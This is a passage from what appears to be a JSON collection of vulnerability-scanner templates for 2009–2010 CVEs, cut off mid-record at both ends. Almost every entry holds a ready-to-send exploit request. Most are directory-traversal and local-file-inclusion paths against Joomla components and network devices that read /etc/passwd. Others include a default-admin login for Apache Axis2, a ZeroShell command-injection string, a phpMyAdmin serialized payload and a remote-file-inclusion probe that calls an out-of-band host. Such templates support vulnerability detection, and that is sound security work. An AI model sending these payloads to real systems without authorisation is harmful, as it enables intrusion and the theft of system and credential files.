Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1858","info":{"name":"Joomla! Component SMEStorage - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1658","info":{"name":"Joomla! Component NoticeBoard 1.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2307","info":{"name":"Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2034","info":{"name":"Joomla! Component Percha Image Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1657","info":{"name":"Joomla! Component SmartSite 1.0.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1870","info":{"name":"ListSERV Maestro <= 9.0-8 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lui/","{{BaseURL}}/hub/"],"extractors":[{"type":"regex","regex":["LISTSERV Maestro\\s+9\\.0-[123456780]","LISTSERV Maestro\\s+[5678]","Administration Hub 9\\.0-[123456780]","Administration Hub [5678]"]}]}]},{"id":"CVE-2010-1476","info":{"name":"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2122","info":{"name":"Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1308","info":{"name":"Joomla! Component SVMap 1.1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1602","info":{"name":"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1472","info":{"name":"Joomla! Component Horoscope 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1586","info":{"name":"HP System Management Homepage (SMH) v2.x.x.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/red2301.html?RedirectUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2010-0219","info":{"name":"Apache Axis2 Default Login","severity":"critical"},"requests":[{"raw":["POST /axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginUsername={{username}}&loginPassword={{password}}\n","POST /axis2/axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserName={{username}}&password={{password}}&submit=+Login+\n"],"payloads":{"username":["admin"],"password":["axis2"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","words":["<h1>Welcome to Axis2 Web Admin Module !!</h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2507","info":{"name":"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1475","info":{"name":"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1306","info":{"name":"Joomla! Component Picasa 2.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1315","info":{"name":"Joomla! Component webERPcustomer - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1429","info":{"name":"Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/status?full=true"],"matchers-condition":"and","matchers":[{"type":"word","words":["JVM","memory","localhost/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2857","info":{"name":"Joomla! Component Music Manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5028","info":{"name":"Joomla! Component JE Job 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4239","info":{"name":"Tiki Wiki CMS Groupware 5.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2010-1982","info":{"name":"Joomla! Component JA Voice 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1718","info":{"name":"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4719","info":{"name":"Joomla! Component JRadio - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1461","info":{"name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1531","info":{"name":"Joomla! Component redSHOP 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1878","info":{"name":"Joomla! Component OrgChart 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2259","info":{"name":"Joomla! Component com_bfsurvey - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1354","info":{"name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2045","info":{"name":"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1532","info":{"name":"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0759","info":{"name":"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2050","info":{"name":"Joomla! Component MS Comment 0.8.0b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4231","info":{"name":"Camtron CMNC-200 IP Camera - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4282","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1607","info":{"name":"Joomla! Component WMI 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1979","info":{"name":"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2682","info":{"name":"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1956","info":{"name":"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1312","info":{"name":"Joomla! Component News Portal 1.5.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1340","info":{"name":"Joomla! Component com_jresearch - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1478","info":{"name":"Joomla! Component Jfeedback 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0467","info":{"name":"Joomla! Component CCNewsLetter - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2918","info":{"name":"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4769","info":{"name":"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1470","info":{"name":"Joomla! Component Web TV 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1981","info":{"name":"Joomla! Component Fabrik 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1953","info":{"name":"Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1307","info":{"name":"Joomla! Component Magic Updater - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4617","info":{"name":"Joomla! Component JotLoader 2.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1603","info":{"name":"Joomla! Component ZiMBCore 0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1305","info":{"name":"Joomla! Component JInventory 1.23.02 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1957","info":{"name":"Joomla! Component Love Factory 1.3.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2033","info":{"name":"Joomla! Percha Categories Tree 0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2036","info":{"name":"Joomla! Component Percha Fields Attach 1.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1491","info":{"name":"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1056","info":{"name":"Joomla! Component com_rokdownloads - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0943","info":{"name":"Joomla! Component com_jashowcase - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1977","info":{"name":"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0972","info":{"name":"Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1955","info":{"name":"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1313","info":{"name":"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0157","info":{"name":"Joomla! Component com_biblestudy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1353","info":{"name":"Joomla! Component LoginBox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3203","info":{"name":"Joomla! Component PicSell 1.0 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1217","info":{"name":"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1534","info":{"name":"Joomla! Component Shoutbox Pro - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1723","info":{"name":"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1314","info":{"name":"Joomla! Component Highslide 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2680","info":{"name":"Joomla! Component jesectionfinder - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1471","info":{"name":"Joomla! Component Address Book 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1952","info":{"name":"Joomla! Component BeeHeard 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1535","info":{"name":"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1345","info":{"name":"Joomla! Component Cookex Agency CKForms - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1533","info":{"name":"Joomla! Component TweetLA 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0545","info":{"name":"ZeroShell <= 1.0beta11 Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2009-1151","info":{"name":"PhpMyAdmin Scripts - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /scripts/setup.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2100","info":{"name":"Joomla! JoomlaPraise Projectfork  2.0.10 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4223","info":{"name":"KR-Web <=1.1b2 - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5114","info":{"name":"WebGlimpse 2.18.7 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1558","info":{"name":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-3318","info":{"name":"Joomla! Roland Breedveld Album 1.14 - Local File 